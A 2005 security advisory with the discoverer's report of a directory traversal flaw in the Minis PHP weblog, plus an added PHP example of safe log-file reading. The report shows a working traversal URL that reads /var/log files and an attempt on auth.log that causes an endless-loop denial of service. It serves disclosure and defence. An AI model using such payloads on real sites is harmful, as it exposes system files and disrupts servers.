


Category:   Application (Forum/Board/Portal)  >   Minis
Vendors:
Minis Discloses Certain Files to Remote Users
SecurityTracker Alert ID:  1012911
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jan 16 2005
Impact:   Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Version(s): 0.2.1
Description:   Madelman reported a vulnerability in Minis. A remote user can view certain files on the system.

The script does not properly validate the user-supplied month parameter. A remote user can view files that have the '.log' file extension. A demonstration exploit URL is provided:


If the user attempts to view a file that the web server process does not have privileges to read, the script will enter an endless loop. A demonstration exploit URL is provided:


The vendor was notified on December 31, 2004.

Impact:   A remote user can view files on the system that have the '.log' file extension.
Solution:   No solution was available at the time of this entry.
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.
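
Added example (not part of the advisory and not Minis code): one way a PHP script can read a per-month log file without the two defects described above, the unvalidated month parameter and the read loop that never ends when the file cannot be opened. The function name read_month_log(), the blog/<month>.log layout and the YYYY-MM month format are assumptions made for illustration.

```php
<?php
// Added example, not Minis source. Assumed: entries are stored as
// blog/<month>.log and month values look like "2004-12".
// read_month_log() is a hypothetical helper name.
function read_month_log(string $month, string $blogDir): ?array
{
    // 1. Allow-list the parameter so "/", ".." and NUL bytes cannot pass.
    if (!preg_match('/\A\d{4}-\d{2}\z/', $month)) {
        return null;
    }

    // 2. Defence in depth: resolve the path and require it to stay in blog/.
    $base = realpath($blogDir);
    $path = realpath($blogDir . '/' . $month . '.log');
    if ($base === false || $path === false ||
        strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null; // no such file, or it resolved outside blog/
    }

    // 3. Check the handle before looping. The warnings in the advisory show
    //    feof()/fgets() being called repeatedly on a failed fopen() result.
    $fp = @fopen($path, 'rb');
    if ($fp === false) {
        return null;
    }
    $lines = [];
    while (($line = fgets($fp)) !== false) { // ends on EOF and on read error
        $lines[] = rtrim($line, "\r\n");
    }
    fclose($fp);
    return $lines;
}

// Constructed demo data: one legitimate month file in a temporary blog/ dir.
$dir = sys_get_temp_dir() . '/minis_demo_' . getmypid();
mkdir($dir . '/blog', 0700, true);
file_put_contents($dir . '/blog/2004-12.log', "first entry\nsecond entry\n");

foreach (['2004-12', '../../../../../../../../var/log/XFree86.0', '1999-01'] as $m) {
    $r = read_month_log($m, $dir . '/blog');
    printf("%-42s => %s\n", $m, $r === null ? 'No such month.' : count($r) . ' entries');
}

unlink($dir . '/blog/2004-12.log');
rmdir($dir . '/blog');
rmdir($dir);
```

Run with the PHP command-line interpreter; unreadable, missing and out-of-directory paths all take the same "No such month." branch, so the response does not reveal which files exist.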

 Source Message Contents

Subject:  Minis directory traversal vulnerability


Title: Minis directory traversal vulnerability
Vulnerability discovery: Madelman <madelman AT>
Date: 31/12/2004
Severity: Moderate

--------

(from vendor site:

Minis is a tiny, PHP-powered, text-file based weblogging system.
It is easily configured for normal use and it doesn't require any
databases, such as MySQL. Also, with some PHP-knowledge you'll be
able to configure Minis endlessly.

Minis doesn't check the month parameter which allows reading any file with .log extension

This vulnerability has been tested with Minis 0.2.1

--------

If we want to read /var/log/XFree86.0.log:

RETURNS: (looking at source of HTML)
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=This is a pre-release version of XFree86, and is not supported in any
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=way.  Bugs may be reported to XFree86@XFree86.Org and patches submitted
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=to fixes@XFree86.Org.  Before reporting bugs in pre-release versions,
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=please check the latest version in the XFree86 CVS repository
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=(http://www.XFree86.Org/cvs).
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=XFree86 Version (Debian 4.3.0.dfsg.1-4 20040529113443
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=Release Date: 15 August 2003
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=X Protocol Version 11, Revision 0, Release 6.6
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=Build Operating System: Linux 2.6.6-rc3-bk9 i686 [ELF]
"></a><br>: <a href="minis.php?month=../../../../../../../../var/log/XFree86.0&entry=Build Date: 29 May 2004

If we try to read a file that doesn't exist (in this example /var/log/XFree86.log) Minis returns "No such month"

No such month.

If we try to read a file the webserver doesn't have authorization to, Minis enters an endless loop which
could cause an incredible amount of bandwidth spent by the server or even a DoS

Warning: fopen(blog/../../../../../../../../var/log/auth.log): failed to open stream: Permission denied in /var/www/minis/minis.php on line 109


Warning: feof(): supplied argument is not a valid stream resource in /var/www/minis/minis.php on line 111

Warning: fgets(): supplied argument is not a valid stream resource in /var/www/minis/minis.php on line 112

Warning: feof(): supplied argument is not a valid stream resource in /var/www/minis/minis.php on line 111

Warning: fgets(): supplied argument is not a valid stream resource in /var/www/minis/minis.php on line 112

--------

31/12/2004 - Vulnerability found
31/12/2004 - Vendor contacted
16/01/2005 - Vendor hasn't replied. Advisory released